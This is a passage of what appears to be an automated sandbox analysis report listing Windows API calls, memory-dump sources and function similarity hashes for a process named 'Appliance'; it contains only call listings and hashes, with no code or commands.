                                                                                                                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,00000000,?,?,?,00E3CC63,00000000), ref: 00E3D97D
                                                                                                                                            • InternetReadFile.WININET(?,00000000,?,?), ref: 00E3D9B4
                                                                                                                                            • GetLastError.KERNEL32(?,00000000,?,?,?,00E3CC63,00000000), ref: 00E3D9F9
                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00E3CC63,00000000), ref: 00E3DA0D
                                                                                                                                            • SetEvent.KERNEL32(?,?,00000000,?,?,?,00E3CC63,00000000), ref: 00E3DA37
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: EventInternet$AvailableDataErrorFileLastQueryRead
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3191363074-0
                                                                                                                                            • Opcode ID: 7021304a104d11015c2e86a84d2c37762287707671d1a8dd4a8876b977f0e095
                                                                                                                                            • Instruction ID: bd8185ef852a1a35c649d1d9a1d6a6f267b672ed58d0b7da9afea25799568eff
                                                                                                                                            • Opcode Fuzzy Hash: 7021304a104d11015c2e86a84d2c37762287707671d1a8dd4a8876b977f0e095
                                                                                                                                            • Instruction Fuzzy Hash: 4C317C71508304EFDB24DFA6EC88AAABBFCEB44355F10982EE546E2150D770EE44DB60
                                                                                                                                            APIs
                                                                                                                                            • SendMessageW.USER32(?,00001053,000000FF,?), ref: 00E561E4
                                                                                                                                            • SendMessageW.USER32(?,00001074,?,00000001), ref: 00E5623C
                                                                                                                                            • _wcslen.LIBCMT ref: 00E5624E
                                                                                                                                            • _wcslen.LIBCMT ref: 00E56259
                                                                                                                                            • SendMessageW.USER32(?,00001002,00000000,?), ref: 00E562B5
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: MessageSend$_wcslen
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 763830540-0
                                                                                                                                            • Opcode ID: 6651a58cde34d493c1dfe21ff26f742647afc2c9cffe32f2e33003989d02e6c1
                                                                                                                                            • Instruction ID: 4454408278f36480573b2479dd801c3cfe8665a29428adfa12996513af51a2f7
                                                                                                                                            • Opcode Fuzzy Hash: 6651a58cde34d493c1dfe21ff26f742647afc2c9cffe32f2e33003989d02e6c1
                                                                                                                                            • Instruction Fuzzy Hash: E121A5359002189ADF219F55CC84AEE77B8EF44315F105A16FD25FB190D7708989CF60
                                                                                                                                            APIs
                                                                                                                                            • IsWindow.USER32(00000000), ref: 00E413AE
                                                                                                                                            • GetForegroundWindow.USER32 ref: 00E413C5
                                                                                                                                            • GetDC.USER32(00000000), ref: 00E41401
                                                                                                                                            • GetPixel.GDI32(00000000,?,00000003), ref: 00E4140D
                                                                                                                                            • ReleaseDC.USER32(00000000,00000003), ref: 00E41445
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Window$ForegroundPixelRelease
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 4156661090-0
                                                                                                                                            • Opcode ID: 00c9953ca5a41d1209728a1eaf44ed146e75c56a56452337e5e0cc57b9c4f5bf
                                                                                                                                            • Instruction ID: 1492ee9b5155825b3a1f4c2758862e89e95d6f85c7ece5c8e84c3b9e20d34fc2
                                                                                                                                            • Opcode Fuzzy Hash: 00c9953ca5a41d1209728a1eaf44ed146e75c56a56452337e5e0cc57b9c4f5bf
                                                                                                                                            • Instruction Fuzzy Hash: FF216276604204AFDB14DF65DC89A9EBBE5EF48301F04847DE54AE7751DA70AC44CB60
                                                                                                                                            APIs
                                                                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 00DFD146
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00DFD169
                                                                                                                                              • Part of subcall function 00DF3B93: RtlAllocateHeap.NTDLL(00000000,?,?,?,00DE6A79,?,0000015D,?,?,?,?,00DE85B0,000000FF,00000000,?,?), ref: 00DF3BC5
                                                                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00DFD18F
                                                                                                                                            • _free.LIBCMT ref: 00DFD1A2
                                                                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00DFD1B1
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 336800556-0
                                                                                                                                            • Opcode ID: 36a58fbb881f873ddb6b86cf9b39bb9e4ee58380c36be303f1c6034a0bb437a7
                                                                                                                                            • Instruction ID: d3b30c43de17cd685414ff67879e54f2cd08257342582989781a9926660725ea
                                                                                                                                            • Opcode Fuzzy Hash: 36a58fbb881f873ddb6b86cf9b39bb9e4ee58380c36be303f1c6034a0bb437a7
                                                                                                                                            • Instruction Fuzzy Hash: 2701847660671D7F33216A779C8CD7B7A6FDFC2B6131A8629FE04D6244DA708D0181B1
                                                                                                                                            APIs
                                                                                                                                            • GetLastError.KERNEL32(0000000A,?,?,00DEF64E,00DE545F,0000000A,?,00000000,00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00DF3170
                                                                                                                                            • _free.LIBCMT ref: 00DF31A5
                                                                                                                                            • _free.LIBCMT ref: 00DF31CC
                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00DF31D9
                                                                                                                                            • SetLastError.KERNEL32(00000000,?,00000000,?,?,?,0000000A,00000000), ref: 00DF31E2
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: ErrorLast$_free
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3170660625-0
                                                                                                                                            • Opcode ID: a16b5da106c59c32e6fefff2639bebe9e6c17797db49e9eb07f90fdf9ff34aab
                                                                                                                                            • Instruction ID: 5ed3c443335171b4ac2c98df74e238ed557dfb20d2b46672d6795be4ceac36e3
                                                                                                                                            • Opcode Fuzzy Hash: a16b5da106c59c32e6fefff2639bebe9e6c17797db49e9eb07f90fdf9ff34aab
                                                                                                                                            • Instruction Fuzzy Hash: C5012D726497082F9A1227359C49D7B165DEFC1772727C524FB15E22D1EF21CF054270
                                                                                                                                            APIs
                                                                                                                                            • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?,?,00E20C4E), ref: 00E2091B
                                                                                                                                            • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?), ref: 00E20936
                                                                                                                                            • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?), ref: 00E20944
                                                                                                                                            • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?), ref: 00E20954
                                                                                                                                            • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00E20831,80070057,?,?), ref: 00E20960
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3897988419-0
                                                                                                                                            • Opcode ID: a5dd92b056437b6b58eccd9968be3d17ee218f994dd0e66f24681e13c4a0477b
                                                                                                                                            • Instruction ID: 250d7484bafff0c843fa44e4899f34c5afefec172fdf8096d2f6a0fe23652bca
                                                                                                                                            • Opcode Fuzzy Hash: a5dd92b056437b6b58eccd9968be3d17ee218f994dd0e66f24681e13c4a0477b
                                                                                                                                            • Instruction Fuzzy Hash: F901DB72600324AFEB294F56EC04B9A7BACEBC4796F140424F906F2252E770CD808BA0
                                                                                                                                            APIs
                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00E2F2AE
                                                                                                                                            • QueryPerformanceFrequency.KERNEL32(?), ref: 00E2F2BC
                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 00E2F2C4
                                                                                                                                            • QueryPerformanceCounter.KERNEL32(?), ref: 00E2F2CE
                                                                                                                                            • Sleep.KERNEL32 ref: 00E2F30A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2833360925-0
                                                                                                                                            • Opcode ID: 8dbeca164c287f6af1341c47551b44ec183cd8d57d6baa676bce3ea125a315e1
                                                                                                                                            • Instruction ID: 3a0f5f60c41c55ea9f40fd569ad4b4092ee852f397c335cfa408619d3373c7b7
                                                                                                                                            • Opcode Fuzzy Hash: 8dbeca164c287f6af1341c47551b44ec183cd8d57d6baa676bce3ea125a315e1
                                                                                                                                            • Instruction Fuzzy Hash: DC01A931C05629DFCF14EFA5ED48AEEBB78FB08701F00182AE501F2290CB309558C7A1
                                                                                                                                            APIs
                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00E21A60
                                                                                                                                            • GetLastError.KERNEL32(?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A6C
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A7B
                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00E214E7,?,?,?), ref: 00E21A82
                                                                                                                                            • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00E21A99
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 842720411-0
                                                                                                                                            • Opcode ID: 44b3dd49bb2f3efb5a0e1e2941d1e330a505045a7e5b4e0f79ca4c605bbb7622
                                                                                                                                            • Instruction ID: 868b695bd438ebffed4176f8351340cb4002ca502883ccd37f8f28894dc7b131
                                                                                                                                            • Opcode Fuzzy Hash: 44b3dd49bb2f3efb5a0e1e2941d1e330a505045a7e5b4e0f79ca4c605bbb7622
                                                                                                                                            • Instruction Fuzzy Hash: 4B01A4B5601716BFDF254F65EC48D6B3B7DEF84365B210854F845E3260DA71DD40CA60
                                                                                                                                            APIs
                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00E21976
                                                                                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00E21982
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E21991
                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00E21998
                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00E219AE
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                            • Opcode ID: 08dbf52eeeaf4a0692a32e5edee6d37d55a1bf2d3fedcc519b98ca3404b7a59c
                                                                                                                                            • Instruction ID: b78bd842bd0327ecfb49f5317844b5dbb7f03bb571d189c065f02355e17e61c6
                                                                                                                                            • Opcode Fuzzy Hash: 08dbf52eeeaf4a0692a32e5edee6d37d55a1bf2d3fedcc519b98ca3404b7a59c
                                                                                                                                            • Instruction Fuzzy Hash: D9F06275104311AFDB254F65EC59F563B6DEFC97A1F100854F946E7290CA70DA44CA60
                                                                                                                                            APIs
                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00E21916
                                                                                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00E21922
                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00E21931
                                                                                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00E21938
                                                                                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00E2194E
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 44706859-0
                                                                                                                                            • Opcode ID: cb14aa4e57f310059de39470f0f1abc71a49ce4517eb07dcc000ae07361a3096
                                                                                                                                            • Instruction ID: a021b99b3921648e7cd5ca82f53a1530c66eae717d33cc299a7f55fb1fad9bad
                                                                                                                                            • Opcode Fuzzy Hash: cb14aa4e57f310059de39470f0f1abc71a49ce4517eb07dcc000ae07361a3096
                                                                                                                                            • Instruction Fuzzy Hash: 5EF04F75104311BFDB250F66AC49F563B6DEF897A1F100854FA45E7290CA70DC44CA60
                                                                                                                                            APIs
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00E30B24,?,00E33D41,?,00000001,00E03AF4,?), ref: 00E30CCB
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00E30B24,?,00E33D41,?,00000001,00E03AF4,?), ref: 00E30CD8
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00E30B24,?,00E33D41,?,00000001,00E03AF4,?), ref: 00E30CE5
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00E30B24,?,00E33D41,?,00000001,00E03AF4,?), ref: 00E30CF2
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00E30B24,?,00E33D41,?,00000001,00E03AF4,?), ref: 00E30CFF
                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,00E30B24,?,00E33D41,?,00000001,00E03AF4,?), ref: 00E30D0C
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: CloseHandle
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                            • Opcode ID: 5b9da90cfe51f6d80d46654d4a9c2dccc493176557d19fcb034a5251d04ef5b3
                                                                                                                                            • Instruction ID: 276b16ce0d5f72c1b6bb8e32bcd080d76637ae729194493c03d614dabd962ae6
                                                                                                                                            • Opcode Fuzzy Hash: 5b9da90cfe51f6d80d46654d4a9c2dccc493176557d19fcb034a5251d04ef5b3
                                                                                                                                            • Instruction Fuzzy Hash: D401A271800B15DFCB30AF66D990816FBF5BF50319715AA3ED19662931C7B0A948DF80
                                                                                                                                            APIs
                                                                                                                                            • GetDlgItem.USER32(?,000003E9), ref: 00E265BF
                                                                                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 00E265D6
                                                                                                                                            • MessageBeep.USER32(00000000), ref: 00E265EE
                                                                                                                                            • KillTimer.USER32(?,0000040A), ref: 00E2660A
                                                                                                                                            • EndDialog.USER32(?,00000001), ref: 00E26624
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3741023627-0
                                                                                                                                            • Opcode ID: ce1206f08b3d9a4fb209b6e09f81d97295a8e5bbe716b432e53770ca644cc545
                                                                                                                                            • Instruction ID: 3a668ff6ee928f6a20beb91060d6e439e5ec5d6192c1ca51e350ce0f92b005dc
                                                                                                                                            • Opcode Fuzzy Hash: ce1206f08b3d9a4fb209b6e09f81d97295a8e5bbe716b432e53770ca644cc545
                                                                                                                                            • Instruction Fuzzy Hash: A1018630504314AFEB345F51ED4EF967BB8FB00706F000A99E187710E1DBF0AA898A50
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 00DFDAD2
                                                                                                                                              • Part of subcall function 00DF2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4), ref: 00DF2D4E
                                                                                                                                              • Part of subcall function 00DF2D38: GetLastError.KERNEL32(00E91DC4,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4,00E91DC4), ref: 00DF2D60
                                                                                                                                            • _free.LIBCMT ref: 00DFDAE4
                                                                                                                                            • _free.LIBCMT ref: 00DFDAF6
                                                                                                                                            • _free.LIBCMT ref: 00DFDB08
                                                                                                                                            • _free.LIBCMT ref: 00DFDB1A
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 0000000A.00000002.2110819159.0000000000DC1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00DC0000, based on PE: true
                                                                                                                                            • Associated: 0000000A.00000002.2110755680.0000000000DC0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E5D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2110913118.0000000000E83000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111221267.0000000000E8D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            • Associated: 0000000A.00000002.2111249949.0000000000E95000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_10_2_dc0000_Appliance.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 776569668-0
                                                                                                                                            • Opcode ID: 85f4b0cdc940134dbacb1d6f4003f083bb9d76e84e8ce4c66c1d6201965f61d5
                                                                                                                                            • Instruction ID: b4292ae5d67183e3aacf514e8e3493cfd9c1d7e081ad457e9dc54f85cb86788e
                                                                                                                                            • Opcode Fuzzy Hash: 85f4b0cdc940134dbacb1d6f4003f083bb9d76e84e8ce4c66c1d6201965f61d5
                                                                                                                                            • Instruction Fuzzy Hash: 7CF0EC3254820CAF8624EB59ED85C7A77EFEB4471079A8805F619E7541CA21FC8087B4
                                                                                                                                            APIs
                                                                                                                                            • _free.LIBCMT ref: 00DF262E
                                                                                                                                              • Part of subcall function 00DF2D38: RtlFreeHeap.NTDLL(00000000,00000000,?,00DFDB51,00E91DC4,00000000,00E91DC4,00000000,?,00DFDB78,00E91DC4,00000007,00E91DC4,?,00DFDF75,00E91DC4), ref: 00DF2D4E
